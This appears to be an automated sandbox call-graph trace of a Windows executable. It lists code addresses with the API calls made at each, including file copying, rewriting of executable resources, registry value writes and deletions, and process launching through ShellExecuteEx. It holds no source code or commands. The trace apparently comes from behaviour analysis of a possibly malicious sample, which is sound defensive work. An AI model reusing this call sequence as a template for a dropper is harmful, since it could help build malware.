47318a 37691->37693 37709 473266 37692->37709 37694 472ef0 12 API calls 37693->37694 37695 4731a3 37694->37695 37699 4731b5 LoadLibraryA GetProcAddress 37695->37699 37700 4731fe SHGetSpecialFolderLocation SHGetPathFromIDList 37695->37700 37696 4049e4 12 API calls 37697 4732fa 37696->37697 37698 4049c0 12 API calls 37697->37698 37702 473305 37698->37702 37806 408ca8 22 API calls 37699->37806 37704 47322c 37700->37704 37702->37330 37703 4731e6 37807 404b1c 13 API calls 37703->37807 37706 404ccc 12 API calls 37704->37706 37708 47324b 37706->37708 37707 4731f9 37707->37709 37710 409a58 GetFileAttributesA 37708->37710 37709->37696 37711 473256 37710->37711 37712 47325a 37711->37712 37713 473268 37711->37713 37808 404a14 12 API calls 37712->37808 37715 404ccc 12 API calls 37713->37715 37716 47327a 37715->37716 37717 409a58 GetFileAttributesA 37716->37717 37718 473285 37717->37718 37719 473297 37718->37719 37720 473289 37718->37720 37722 4049c0 12 API calls 37719->37722 37809 404a14 12 API calls 37720->37809 37722->37709 37724 404cd0 37723->37724 37731 404c88 37723->37731 37725 404a14 37724->37725 37726 404ce0 37724->37726 37727 404cee 37724->37727 37724->37731 37729 404a84 12 API calls 37725->37729 37734 404a28 37725->37734 37732 404a14 12 API calls 37726->37732 37733 404a84 12 API calls 37727->37733 37728 404a56 37728->37337 37729->37734 37730 404ccb 37730->37337 37731->37725 37731->37730 37735 404c96 37731->37735 37732->37731 37741 404d01 37733->37741 37734->37728 37810 40277c 12 API calls 37734->37810 37736 404cc0 37735->37736 37737 404ca9 37735->37737 37740 40500c 12 API calls 37736->37740 37739 40500c 12 API calls 37737->37739 37743 404cae 37739->37743 37740->37743 37742 404a14 12 API calls 37741->37742 37744 404d2d 37742->37744 37743->37337 37744->37337 37746 409882 37745->37746 37747 4098ae 37745->37747 37811 4096bc 12 API calls 37746->37811 37749 404a14 12 API calls 37747->37749 37755 40989a 37747->37755 37749->37755 37750 409887 37751 40988b 37750->37751 37752 40989c 37750->37752 37753 404a14 12 API calls 37751->37753 37754 404a14 12 API calls 37752->37754 37753->37755 37756 4098ab 37754->37756 37755->37354 37756->37354 37812 404e80 37757->37812 37760 409a6d 37760->37315 37760->37320 37761->37328 37763 41e0da 37762->37763 37772 41e198 FindResourceA 37763->37772 37765 41e108 37765->37631 37767 404e8c 37766->37767 37768 404ec7 37767->37768 37769 404a84 12 API calls 37767->37769 37768->37637 37770 404ea3 37769->37770 37770->37768 37784 40277c 12 API calls 37770->37784 37773 41e1c4 LoadResource 37772->37773 37774 41e1bd 37772->37774 37776 41e1d7 37773->37776 37777 41e1de SizeofResource LockResource 37773->37777 37782 41e128 13 API calls 37774->37782 37783 41e128 13 API calls 37776->37783 37780 41e1fc 37777->37780 37778 41e1c3 37778->37773 37780->37765 37781 41e1dd 37781->37777 37782->37778 37783->37781 37784->37768 37785->37640 37798 432244 37786->37798 37789 4322b2 37792 404ab0 12 API calls 37789->37792 37790 432301 37791 4049c0 12 API calls 37790->37791 37795 4322f6 37791->37795 37793 4322bd 37792->37793 37801 432378 14 API calls 37793->37801 37795->37651 37796 4322d5 37796->37795 37797 40500c 12 API calls 37796->37797 37797->37795 37802 4321f4 37798->37802 37800 432258 37800->37789 37800->37790 37801->37796 37803 43220d 37802->37803 37804 432221 RegQueryValueExA 37803->37804 37805 432238 37804->37805 37805->37800 37806->37703 37807->37707 37808->37709 37809->37709 37810->37728 37811->37750 37813 404e84 GetFileAttributesA 37812->37813 37813->37760 37815 430f42 37814->37815 37839 430158 37815->37839 37817 430f57 37843 431228 37817->37843 37819 430f6d 37819->37368 37850 49497c 37820->37850 37825 4049c0 12 API calls 37826 494ad3 37825->37826 37827 431494 37826->37827 37837 43149c 37827->37837 37828 4315fc 37829 4049e4 12 API calls 37828->37829 37830 431616 37829->37830 37831 4049c0 12 API calls 37830->37831 37832 43161e 37831->37832 37832->37374 37833 408ff8 12 API calls 37833->37837 37835 404ee0 12 API calls 37835->37837 37836 40500c 12 API calls 37836->37837 37837->37828 37837->37833 37837->37835 37837->37836 37838 404d40 12 API calls 37837->37838 37876 404f20 12 API calls 37837->37876 37838->37837 37840 43015f 37839->37840 37841 404a14 12 API calls 37840->37841 37842 430177 37841->37842 37842->37817 37844 431235 37843->37844 37846 431290 37843->37846 37845 409a48 4 API calls 37844->37845 37847 43123d 37845->37847 37846->37819 37847->37846 37848 431494 12 API calls 37847->37848 37849 431273 37848->37849 37849->37819 37867 404a58 37850->37867 37853 4049c0 12 API calls 37859 4949aa 37853->37859 37854 4949ef 37855 4049e4 12 API calls 37854->37855 37857 494a09 37855->37857 37862 494a18 37857->37862 37859->37854 37871 404ee0 12 API calls 37859->37871 37872 494848 12 API calls 37859->37872 37873 404a14 12 API calls 37859->37873 37874 404f20 12 API calls 37859->37874 37863 404a14 12 API calls 37862->37863 37864 494a30 37863->37864 37865 494a83 37864->37865 37866 404ed8 12 API calls 37864->37866 37865->37825 37866->37864 37869 404a5c 37867->37869 37868 404a80 37868->37853 37869->37868 37875 40277c 12 API calls 37869->37875 37871->37859 37872->37859 37873->37859 37874->37859 37875->37868 37876->37837 37878 404e80 37877->37878 37879 409f60 CreateDirectoryA 37878->37879 37879->37484 37881 473824 37880->37881 37882 409a48 4 API calls 37881->37882 37883 473842 37882->37883 37884 473865 37883->37884 37886 409a90 2 API calls 37883->37886 37885 47387a CopyFileA 37884->37885 37887 47388a 37885->37887 37886->37884 37888 409a90 2 API calls 37887->37888 37889 473894 37888->37889 37890 4049e4 12 API calls 37889->37890 37891 4738ae 37890->37891 37891->37485 37893 474b1a 37892->37893 37950 409a7c 37893->37950 37895 474b38 37896 409a90 2 API calls 37895->37896 37897 474b48 37896->37897 37898 474b52 BeginUpdateResourceA 37897->37898 37899 474b66 37898->37899 37900 474bd9 37898->37900 37902 40275c 12 API calls 37899->37902 37901 409a90 2 API calls 37900->37901 37903 474be4 37901->37903 37904 474b7d 37902->37904 37905 4049e4 12 API calls 37903->37905 37907 474b8f UpdateResourceA EndUpdateResourceA 37904->37907 37906 474bfe 37905->37906 37906->37505 37908 474bad 37907->37908 37953 40277c 12 API calls 37908->37953 37910 474bd1 37910->37505 37912 474964 37911->37912 37913 4049c0 12 API calls 37912->37913 37914 474981 37913->37914 37915 404ed8 12 API calls 37914->37915 37916 474994 73E714E0 37915->37916 37917 4749a7 37916->37917 37918 474a90 37916->37918 37920 40275c 12 API calls 37917->37920 37919 4049c0 12 API calls 37918->37919 37922 474aa5 37919->37922 37921 4749af 37920->37921 37923 404ed8 12 API calls 37921->37923 37924 4049e4 12 API calls 37922->37924 37925 4749d4 73E714C0 37923->37925 37926 474ab2 37924->37926 37927 4749e2 73E71500 37925->37927 37928 474a66 37925->37928 37926->37507 37930 4749fc 37927->37930 37931 474a48 37927->37931 37957 40277c 12 API calls 37928->37957 37954 40a664 37930->37954 37933 404ed8 12 API calls 37931->37933 37932 474a88 37932->37507 37934 474a58 73E71500 37933->37934 37934->37928 37937 404a58 12 API calls 37937->37931 37939 473593 37938->37939 37940 473612 37939->37940 37941 473602 37939->37941 37977 4321d4 RegDeleteValueA 37940->37977 37973 43226c 37941->37973 37944 473610 37944->37521 37946 404e80 37945->37946 37947 409aa1 SetFileAttributesA 37946->37947 37948 409ab2 37947->37948 37949 409aab GetLastError 37947->37949 37948->37490 37949->37948 37951 404e80 37950->37951 37952 409a86 GetFileAttributesA 37951->37952 37952->37895 37953->37910 37958 40a678 37954->37958 37957->37932 37959 40a69c 37958->37959 37960 40a6c7 37959->37960 37971 40a26c 13 API calls 37959->37971 37962 40a71f 37960->37962 37968 40a6dc 37960->37968 37963 404ab0 12 API calls 37962->37963 37964 40a673 37963->37964 37964->37937 37965 40a715 37966 40500c 12 API calls 37965->37966 37966->37964 37967 4049c0 12 API calls 37967->37968 37968->37965 37968->37967 37969 40500c 12 API calls 37968->37969 37972 40a26c 13 API calls 37968->37972 37969->37968 37971->37960 37972->37968 37974 43227c 37973->37974 37978 432310 37974->37978 37976 432292 37976->37944 37977->37944 37979 432328 37978->37979 37980 43233c RegSetValueExA 37979->37980 37981 43234a 37980->37981 37982 432369 37980->37982 37984 40d23c 13 API calls 37981->37984 37982->37976 37984->37982 37987 4734a7 37985->37987 37986 473507 ShellExecuteEx 37988 473542 37986->37988 37989 47351b 37986->37989 37987->37986 37990 4049e4 12 API calls 37988->37990 37989->37988 37991 473530 WaitForSingleObject 37989->37991 37992 473563 37990->37992 37991->37988 37993 473529 Sleep 37991->37993 37992->37539 37992->37540 37993->37991 37994->37541 37995->37541 37996->37541 37998 404e80 37997->37998 37999 4099fa FindFirstFileA 37998->37999 38000 409a05 FindClose 37999->38000 38001 409a39 37999->38001 38000->38001 38002 409a14 FileTimeToLocalFileTime FileTimeToDosDateTime 38000->38002 38001->37222 38002->38001 38003->37567 38004 49ab80 38015 406d28 GetModuleHandleA 38004->38015 38006 49ab90 38019 45a28c 38006->38019 38010 49abc5 38034 45a714 63 API calls 38010->38034 38012 49abd1 38035 40484c 38012->38035 38016 406d5b 38015->38016 38047 404684 38016->38047 38020 45a2ae 38019->38020 38021 45a2eb 38019->38021 38254 45a240 38020->38254 38022 404a14 12 API calls 38021->38022 38029 45a2e9 38022->38029 38024 4049c0 12 API calls 38025 45a30d 38024->38025 38030 45a694 38025->38030 38026 45a2b8 38027 45a2d4 SetWindowTextA 38026->38027 38026->38029 38028 4049c0 12 API calls 38027->38028 38028->38029 38029->38024 38031 45a6a7 38030->38031 38260 452e3c 38031->38260 38032 45a6c8 38032->38010 38034->38012 38039 404865 38035->38039 38036 404884 38392 4047c0 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 38036->38392 38037 404895 38388 4045c4 38037->38388 38039->38036 38039->38037 38041 40488e 38041->38037 38042 4048aa 38043 4048d0 FreeLibrary 38042->38043 38046 4048d6 38042->38046 38043->38046 38044 40490b 38045 404903 ExitProcess 38046->38044 38046->38045 38048 4046b7 38047->38048 38051 404624 38048->38051 38052 404660 38051->38052 38053 404633 38051->38053 38052->38006 38053->38052 38056 446564 38053->38056 38070 405f94 38053->38070 38057 4465dc 38056->38057 38058 44657e GetVersion 38056->38058 38057->38053 38074 446330 GetCurrentProcessId 38058->38074 38062 4465a2 38102 41a548 RtlLeaveCriticalSection 38062->38102 38064 4465ac 38103 41a4f4 RtlLeaveCriticalSection 38064->38103 38066 4465bc 38104 41a4f4 RtlLeaveCriticalSection 38066->38104 38068 4465cc 38105 41a4f4 RtlLeaveCriticalSection 38068->38105 38071 405fa4 GetModuleFileNameA 38070->38071 38072 405fc0 38070->38072 38235 4061d0 GetModuleFileNameA RegOpenKeyExA 38071->38235 38072->38053 38075 40a664 13 API calls 38074->38075 38076 44636c 38075->38076 38077 404a14 12 API calls 38076->38077 38078 446379 38077->38078 38079 446383 GlobalAddAtomA GetCurrentThreadId 38078->38079 38080 40a664 13 API calls 38079->38080 38081 4463bd 38080->38081 38082 404a14 12 API calls 38081->38082 38083 4463ca 38082->38083 38084 4463d4 GlobalAddAtomA 38083->38084 38085 404e80 38084->38085 38086 4463ea RegisterClipboardFormatA 38085->38086 38106 41af14 38086->38106 38088 446401 38110 457fc8 38088->38110 38090 44642a 38125 4590ac 38090->38125 38092 446440 38137 41a634 15 API calls 38092->38137 38094 44646a GetModuleHandleA 38095 44648a 38094->38095 38096 44647a GetProcAddress 38094->38096 38097 4049c0 12 API calls 38095->38097 38096->38095 38098 44649f 38097->38098 38099 4049c0 12 API calls 38098->38099 38100 4464a7 38099->38100 38101 41a4a8 14 API calls 38100->38101 38101->38062 38102->38064 38103->38066 38104->38068 38105->38057 38107 41af1a 38106->38107 38108 41af2f RtlInitializeCriticalSection 38107->38108 38109 41af44 38108->38109 38109->38088 38111 457fd2 38110->38111 38138 458384 LoadCursorA 38111->38138 38114 458021 38115 45805d GetDC GetDeviceCaps ReleaseDC 38114->38115 38116 458093 38115->38116 38143 424c3c 38116->38143 38118 45809f 38119 424c3c 14 API calls 38118->38119 38120 4580b1 38119->38120 38121 424c3c 14 API calls 38120->38121 38122 4580c3 38121->38122 38147 4587a4 38122->38147 38124 4580d0 38124->38090 38126 4590bb 38125->38126 38127 45917c LoadIconA 38126->38127 38186 42b7c8 38127->38186 38129 45919f GetModuleFileNameA OemToCharA 38130 4591e8 38129->38130 38131 45920e CharLowerA 38130->38131 38132 459231 38131->38132 38133 459242 38132->38133 38188 4593b4 38132->38188 38212 45b188 12 API calls 38133->38212 38136 459264 38136->38092 38137->38094 38139 4583a3 38138->38139 38140 4583bc LoadCursorA 38139->38140 38142 45800b GetKeyboardLayout 38139->38142 38165 45843c 38140->38165 38142->38114 38144 424c42 38143->38144 38168 424180 38144->38168 38146 424c64 38146->38118 38149 4587bd 38147->38149 38148 4587ee SystemParametersInfoA 38150 458801 CreateFontIndirectA 38148->38150 38151 458819 GetStockObject 38148->38151 38149->38148 38178 424fcc 38150->38178 38153 424fcc 17 API calls 38151->38153 38155 45882d SystemParametersInfoA 38153->38155 38156 458881 38155->38156 38157 45884d CreateFontIndirectA 38155->38157 38183 4250b0 17 API calls 38156->38183 38158 424fcc 17 API calls 38157->38158 38160 458866 CreateFontIndirectA 38158->38160 38163 424fcc 17 API calls 38160->38163 38161 458891 GetStockObject 38162 424fcc 17 API calls 38161->38162 38164 45887f 38162->38164 38163->38164 38164->38124 38166 40275c 12 API calls 38165->38166 38167 45844f 38166->38167 38167->38139 38169 42419b 38168->38169 38176 424168 RtlEnterCriticalSection 38169->38176 38171 4241a5 38172 40275c 12 API calls 38171->38172 38175 424202 38171->38175 38172->38175 38174 424253 38174->38146 38177 424174 RtlLeaveCriticalSection 38175->38177 38176->38171 38177->38174 38184 424b88 GetObjectA 38178->38184 38180 424fde 38185 424dc0 16 API calls 38180->38185 38182 424fe7 38182->38155 38183->38161 38184->38180 38185->38182 38187 42b7d4 38186->38187 38187->38129 38189 4593dd 38188->38189 38190 45953f 38188->38190 38189->38190 38213 422bcc 38189->38213 38191 4049c0 12 API calls 38190->38191 38193 459554 38191->38193 38193->38133 38194 4593f6 GetClassInfoA 38195 45941c RegisterClassA 38194->38195 38200 459451 38194->38200 38196 459435 38195->38196 38195->38200 38225 406a70 13 API calls 38196->38225 38198 459442 38226 40d144 12 API calls 38198->38226 38216 407ae4 38200->38216 38202 4594a8 38203 4049c0 12 API calls 38202->38203 38204 4594b6 SetWindowLongA 38203->38204 38205 4594d6 38204->38205 38206 459501 GetSystemMenu DeleteMenu DeleteMenu 38204->38206 38220 45a038 38205->38220 38206->38190 38207 459532 DeleteMenu 38206->38207 38207->38190 38210 45a038 19 API calls 38211 4594f5 SetClassLongA 38210->38211 38211->38206 38212->38136 38214 422bdc VirtualAlloc 38213->38214 38215 422c0a 38213->38215 38214->38215 38215->38194 38227 402c0c 38216->38227 38218 407af7 CreateWindowExA 38219 407b2f 38218->38219 38219->38202 38228 42b534 38220->38228 38223 45a047 LoadIconA 38224 4594dd SendMessageA 38223->38224 38224->38210 38225->38198 38226->38200 38227->38218 38231 42b570 38228->38231 38230 42b53e 38230->38223 38230->38224 38232 42b580 38231->38232 38233 42b5ac 38231->38233 38232->38233 38234 426aa0 18 API calls 38232->38234 38233->38230 38234->38233 38236 406253 38235->38236 38237 406213 RegOpenKeyExA 38235->38237 38253 406018 12 API calls 38236->38253 38237->38236 38238 406231 RegOpenKeyExA 38237->38238 38238->38236 38240 4062dc lstrcpyn GetThreadLocale GetLocaleInfoA 38238->38240 38242 406313 38240->38242 38243 4063f6 38240->38243 38241 406278 RegQueryValueExA 38244 406298 RegQueryValueExA 38241->38244 38245 4062b6 RegCloseKey 38241->38245 38242->38243 38246 406323 lstrlen 38242->38246 38243->38072 38244->38245 38245->38072 38248 40633b 38246->38248 38248->38243 38249 406360 lstrcpyn LoadLibraryExA 38248->38249 38250 406388 38248->38250 38249->38250 38250->38243 38251 406392 lstrcpyn LoadLibraryExA 38250->38251 38251->38243 38252 4063c4 lstrcpyn LoadLibraryExA 38251->38252 38252->38243 38253->38241 38255 45a275 38254->38255 38256 45a255 GetWindowTextA 38254->38256 38258 404a14 12 API calls 38255->38258 38257 404ab0 12 API calls 38256->38257 38259 45a273 38257->38259 38258->38259 38259->38026 38261 452e52 38260->38261 38262 452f66 38261->38262 38269 41aa2c 38261->38269 38262->38032 38264 452f2b 38264->38032 38265 452ee2 38265->38264 38279 406a70 13 API calls 38265->38279 38267 452f19 38280 40d180 13 API calls 38267->38280 38270 41aa42 38269->38270 38271 41aa77 38270->38271 38289 41a8a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 38270->38289 38281 41a984 38271->38281 38276 41aaa2 38277 41aaba 38276->38277 38291 41a928 13 API calls 38276->38291 38277->38265 38279->38267 38280->38264 38284 41a9ae 38281->38284 38288 41aa02 38281->38288 38282 4049c0 12 API calls 38283 41aa19 38282->38283 38283->38276 38290 41a8f8 13 API calls 38283->38290 38285 41a984 20 API calls 38284->38285 38284->38288 38286 41a9c6 38285->38286 38292 41a81c 38286->38292 38288->38282 38289->38271 38290->38276 38291->38277 38293 41a82d 38292->38293 38294 41a83c FindResourceA 38293->38294 38295 41a899 38294->38295 38296 41a84c 38294->38296 38295->38288 38297 41e0d0 17 API calls 38296->38297 38298 41a85d 38297->38298 38301 41da30 38298->38301 38300 41a878 38300->38288 38306 41e254 38301->38306 38303 41da4c 38310 420288 38303->38310 38305 41da67 38305->38300 38307 41e25e 38306->38307 38308 40275c 12 API calls 38307->38308 38309 41e277 38308->38309 38309->38303 38338 420670 38310->38338 38313 420300 38367 420694 13 API calls 38313->38367 38314 420335 38370 420694 13 API calls 38314->38370 38317 42030b 38368 41a398 14 API calls 38317->38368 38318 420346 38320 42034f 38318->38320 38321 42035c 38318->38321 38371 420694 13 API calls 38320->38371 38372 420694 13 API calls 38321->38372 38324 420377 38373 420228 13 API calls 38324->38373 38326 420313 38369 420694 13 API calls 38326->38369 38328 420328 38343 41a0e8 38328->38343 38332 4203d0 38334 420460 38332->38334 38359 425d3c 38332->38359 38363 425a84 38332->38363 38333 4204a0 38333->38305 38334->38333 38374 41ac6c 38334->38374 38378 41ee34 38338->38378 38341 4202c1 38341->38313 38341->38314 38347 41a0f5 38343->38347 38344 41a1cf 38384 41a08c RtlLeaveCriticalSection 38344->38384 38345 41ac6c 13 API calls 38345->38347 38347->38345 38350 41a18e 38347->38350 38348 41a1e6 38351 406cdc 38348->38351 38349 41ac6c 13 API calls 38349->38350 38350->38344 38350->38349 38352 406d11 TlsGetValue 38351->38352 38353 406ceb 38351->38353 38354 406cf6 38352->38354 38355 406d1b 38352->38355 38353->38332 38385 406c98 LocalAlloc TlsSetValue 38354->38385 38355->38332 38357 406cfb TlsGetValue 38358 406d0a 38357->38358 38358->38332 38360 425d55 38359->38360 38362 425d79 38359->38362 38360->38362 38386 40d200 13 API calls 38360->38386 38362->38334 38364 425d3c 13 API calls 38363->38364 38365 425a9a 38364->38365 38366 425ab3 GetTextExtentPoint32A 38365->38366 38366->38334 38367->38317 38368->38326 38369->38328 38370->38318 38371->38328 38372->38324 38373->38328 38375 41ac76 38374->38375 38376 41ac8a 38375->38376 38387 41abf8 13 API calls 38375->38387 38376->38334 38381 41ee3f 38378->38381 38379 41ee79 38379->38341 38382 41e8f4 13 API calls 38379->38382 38381->38379 38383 41ee80 13 API calls 38381->38383 38382->38341 38383->38381 38384->38348 38385->38357 38386->38362 38387->38376 38389 4045d6 38388->38389 38390 404600 38388->38390 38389->38390 38391 4045fa KiUserCallbackDispatcher 38389->38391 38390->38042 38391->38389 38392->38041 38393 41bd4e 38394 41bd5f 38393->38394 38397 4348a8 38394->38397 38398 4348d3 38397->38398 38399 43497d 38397->38399 38402 4348e3 SendMessageA 38398->38402 38400 4049c0 12 API calls 38399->38400 38401 41bd6c 38400->38401 38403 434901 38402->38403 38404 4348ef 38402->38404 38407 434912 SendMessageA 38403->38407 38405 404ccc 12 API calls 38404->38405 38406 4348ff 38405->38406 38410 434959 SendMessageA 38406->38410 38407->38399 38408 43491e 38407->38408 38409 43492e SendMessageA 38408->38409 38409->38399 38411 434938 38409->38411 38413 434967 38410->38413 38412 404ccc 12 API calls 38411->38412 38412->38406 38414 434977 SendMessageA 38413->38414 38414->38399 38415 445e34 38418 42c5e4 38415->38418 38419 42c614 38418->38419 38420 42c5f4 38418->38420 38423 42c64b 38419->38423 38424 42c645 GetSystemMetrics 38419->38424 38425 42c4fc 38420->38425 38424->38423 38429 42c512 38425->38429 38426 4049c0 12 API calls 38427 42c5ba KiUserCallbackDispatcher 38426->38427 38427->38423 38428 42c585 38428->38426 38429->38428 38430 42c56d 38429->38430 38431 42c4fc 12 API calls 38429->38431 38432 42c575 GetProcAddress 38430->38432 38433 42c557 38431->38433 38432->38428 38433->38430 38434 42c565 38433->38434 38435 4049c0 12 API calls 38434->38435 38435->38430 38436 437d70 SetWindowLongA GetWindowLongA 38437 437daf GetWindowLongA 38436->38437 38438 437dcd SetPropA SetPropA 38436->38438 38437->38438 38439 437dbe SetWindowLongA 38437->38439 38442 422ba4 38438->38442 38439->38438 38447 459934 38442->38447 38529 43f118 38442->38529 38545 43eec0 38442->38545 38443 422bba 38448 45999c 38447->38448 38454 45996a 38447->38454 38550 4597e8 38448->38550 38450 4599a7 38452 459a65 38450->38452 38453 4599b7 38450->38453 38451 41ac6c 13 API calls 38451->38454 38455 459a6c 38452->38455 38456 459abb 38452->38456 38457 459f03 38453->38457 38458 4599bd 38453->38458 38454->38448 38454->38451 38525 45998b 38454->38525 38460 459a72 38455->38460 38492 459ddb 38455->38492 38461 459f1d 38456->38461 38462 459ac8 38456->38462 38469 459a49 38456->38469 38571 45aae4 13 API calls 38457->38571 38465 459a31 38458->38465 38466 459a4e 38458->38466 38458->38469 38458->38525 38463 459aa2 38460->38463 38464 459a79 38460->38464 38474 459f26 38461->38474 38475 459f3e 38461->38475 38467 459ec4 IsIconic 38462->38467 38468 459ad3 38462->38468 38463->38469 38486 459db9 38463->38486 38463->38525 38483 459a86 38464->38483 38484 459afd 38464->38484 38464->38525 38470 459fa7 38465->38470 38471 459a37 38465->38471 38472 459a57 38466->38472 38473 459b93 38466->38473 38476 459ed8 GetFocus 38467->38476 38467->38525 38468->38457 38468->38469 38469->38525 38557 4598ac NtdllDefWindowProc_A 38469->38557 38576 4598ac NtdllDefWindowProc_A 38470->38576 38477 459f81 38471->38477 38478 459a40 38471->38478 38472->38469 38479 459ce4 38472->38479 38480 45a038 19 API calls 38473->38480 38572 45a5a4 13 API calls 38474->38572 38573 45a600 14 API calls 38475->38573 38489 459ee9 38476->38489 38476->38525 38574 459840 12 API calls 38477->38574 38478->38469 38490 459bc7 38478->38490 38501 459d12 38479->38501 38479->38525 38480->38525 38483->38469 38493 459c9c SendMessageA 38483->38493 38487 459b0f 38484->38487 38488 459b18 38484->38488 38565 45a47c IsWindowEnabled 38486->38565 38495 459b25 38487->38495 38496 459b16 38487->38496 38558 45a054 27 API calls 38488->38558 38570 451750 GetCurrentThreadId EnumThreadWindows 38489->38570 38561 4598ac NtdllDefWindowProc_A 38490->38561 38505 459e01 IsWindowEnabled 38492->38505 38492->38525 38493->38525 38559 45a104 24 API calls 38495->38559 38560 4598ac NtdllDefWindowProc_A 38496->38560 38564 40edc4 SetErrorMode LoadLibraryA 38501->38564 38503 459ef0 38509 459ef8 SetFocus 38503->38509 38503->38525 38504 459bcd 38510 459c0c 38504->38510 38511 459bea 38504->38511 38512 459e0f 38505->38512 38505->38525 38506 459f9e 38575 4598ac NtdllDefWindowProc_A 38506->38575 38509->38525 38563 45973c 19 API calls 38510->38563 38562 45974c 14 API calls 38511->38562 38521 459e16 IsWindowVisible 38512->38521 38514 459d21 38517 459d70 GetLastError 38514->38517 38518 459d30 GetProcAddress 38514->38518 38517->38525 38522 459d58 38518->38522 38518->38525 38519 459bf2 PostMessageA 38519->38525 38520 459c14 PostMessageA 38520->38525 38523 459e24 GetFocus 38521->38523 38521->38525 38522->38525 38566 441704 38523->38566 38525->38443 38526 459e39 SetFocus 38568 43c130 38526->38568 38530 43f143 38529->38530 38531 43f12b 38529->38531 38534 43f13e 38530->38534 38589 43f084 15 API calls 38530->38589 38532 43f19d 38531->38532 38538 43f12d 38531->38538 38533 43c1fc 67 API calls 38532->38533 38540 43f1a6 38533->38540 38536 43f1da 38534->38536 38578 43c1fc 38534->38578 38536->38443 38538->38534 38541 43f23a GetCapture 38538->38541 38539 43f1f7 38539->38534 38542 43f1fb 38539->38542 38540->38536 38588 43eff0 14 API calls 38540->38588 38541->38534 38542->38536 38544 43f21e NtdllDefWindowProc_A 38542->38544 38544->38536 38549 43f118 70 API calls 38545->38549 38546 43eeef 38626 428b50 18 API calls 38546->38626 38548 43ef06 38548->38443 38549->38546 38551 4597fb 38550->38551 38552 459806 SetThreadLocale 38551->38552 38554 459825 38551->38554 38555 459815 38551->38555 38577 40e2e8 30 API calls 38552->38577 38554->38450 38555->38554 38556 4587a4 25 API calls 38555->38556 38556->38554 38557->38525 38558->38525 38559->38525 38560->38525 38561->38504 38562->38519 38563->38520 38564->38514 38565->38525 38567 44170e 38566->38567 38567->38526 38569 43c14c SetFocus 38568->38569 38569->38525 38570->38503 38571->38522 38572->38522 38573->38522 38574->38506 38575->38525 38576->38525 38577->38555 38579 43c212 38578->38579 38580 43c2ce 38579->38580 38581 43c258 38579->38581 38583 43c2e9 38579->38583 38584 43c2c3 38579->38584 38594 45b21c 48 API calls 38580->38594 38581->38583 38590 45601c 38581->38590 38583->38536 38584->38581 38585 43c32a GetKeyboardState 38584->38585 38586 43c346 38585->38586 38586->38583 38588->38536 38589->38539 38591 45602b 38590->38591 38595 454a44 38591->38595 38593 45603c 38593->38583 38594->38581 38596 454ad8 38595->38596 38606 454a68 38595->38606 38598 454ae9 38596->38598 38623 44e3bc 9 API calls 38596->38623 38599 454b29 38598->38599 38601 454bc1 38598->38601 38603 454b9c 38599->38603 38608 454b44 38599->38608 38600 458260 13 API calls 38600->38606 38602 454bdb 38601->38602 38607 454bd5 SetMenu 38601->38607 38604 454b9a 38602->38604 38603->38602 38612 454bb0 38603->38612 38604->38602 38625 45497c 18 API calls 38604->38625 38606->38596 38606->38600 38621 406a70 13 API calls 38606->38621 38622 40d180 13 API calls 38606->38622 38607->38602 38608->38602 38616 454b67 GetMenu 38608->38616 38609 454bf4 38611 4049c0 12 API calls 38609->38611 38613 454c09 38611->38613 38615 454bb9 SetMenu 38612->38615 38613->38593 38615->38602 38617 454b71 38616->38617 38618 454b8a 38616->38618 38620 454b84 SetMenu 38617->38620 38624 44e3bc 9 API calls 38618->38624 38620->38618 38621->38606 38622->38606 38623->38598 38624->38604 38625->38609 38626->38548 38627 409974 WriteFile 38628 409991 38627->38628 38629 434434 38632 43e6bc 38629->38632 38636 43e6ef 38632->38636 38633 43e768 GetClassInfoA 38634 43e78f 38633->38634 38635 43e7cd 38634->38635 38637 43e7a0 UnregisterClassA 38634->38637 38638 43e7ad RegisterClassA 38634->38638 38658 43e88c 38635->38658 38636->38633 38646 43e71c 38636->38646 38678 406a70 13 API calls 38636->38678 38637->38638 38638->38635 38639 43e7c8 38638->38639 38680 40e79c 15 API calls 38639->38680 38643 43e751 38679 40d180 13 API calls 38643->38679 38644 43e7f1 GetWindowLongA 38648 43e827 38644->38648 38649 43e806 GetWindowLongA 38644->38649 38646->38633 38661 40a1d4 38648->38661 38649->38648 38650 43e818 SetWindowLongA 38649->38650 38650->38648 38652 43e82f 38665 424e24 38652->38665 38654 43e845 38655 4049c0 12 API calls 38654->38655 38656 43445b 38655->38656 38682 407a8c 38658->38682 38660 43e7e3 38660->38644 38681 40e79c 15 API calls 38660->38681 38662 40a1e2 38661->38662 38663 40a1d8 38661->38663 38662->38652 38687 40277c 12 API calls 38663->38687 38666 424e59 38665->38666 38667 424f8c 38665->38667 38688 424168 RtlEnterCriticalSection 38666->38688 38669 4049e4 12 API calls 38667->38669 38670 424fac 38669->38670 38670->38654 38671 424f6d 38690 424174 RtlLeaveCriticalSection 38671->38690 38673 424e63 38673->38671 38689 408f88 CompareStringA 38673->38689 38674 424f84 38674->38654 38676 424efa 38677 424f5e CreateFontIndirectA 38676->38677 38677->38671 38678->38643 38679->38646 38680->38635 38681->38644 38686 402c0c 38682->38686 38684 407a9f CreateWindowExA 38685 407ad9 38684->38685 38685->38660 38686->38684 38687->38662 38688->38673 38689->38676 38690->38674 38691 478cb0 38692 478cc9 38691->38692 38693 478d18 38691->38693 38694 478d03 38692->38694 38695 478cfe 742FF460 38692->38695 38697 4054c8 14 API calls 38694->38697 38695->38694 38697->38693 38698 43eaf8 DestroyWindow 38699 43eb29 38698->38699 38700 43eb2e 38698->38700 38702 40e79c 15 API calls 38699->38702 38702->38700 38703 40991c 38704 404e80 38703->38704 38705 409938 CreateFileA 38704->38705 38706 406b3c 38707 406b55 38706->38707 38708 406b78 38706->38708 38716 40308c 38707->38716 38711 40308c 4 API calls 38712 406b69 38711->38712 38713 40308c 4 API calls 38712->38713 38714 406b73 38713->38714 38723 401b60 38714->38723 38717 4030cb 38716->38717 38718 40309c 38716->38718 38719 4030c9 38717->38719 38736 4028e4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 38717->38736 38718->38717 38721 4030a2 38718->38721 38719->38711 38721->38719 38735 4028e4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 38721->38735 38724 401b71 38723->38724 38725 401c3d 38723->38725 38726 401b92 LocalFree 38724->38726 38727 401b88 RtlEnterCriticalSection 38724->38727 38725->38708 38728 401bc5 38726->38728 38727->38726 38729 401bb3 VirtualFree 38728->38729 38730 401bcd 38728->38730 38729->38728 38731 401bf4 LocalFree 38730->38731 38732 401c0b 38730->38732 38731->38731 38731->38732 38733 401c21 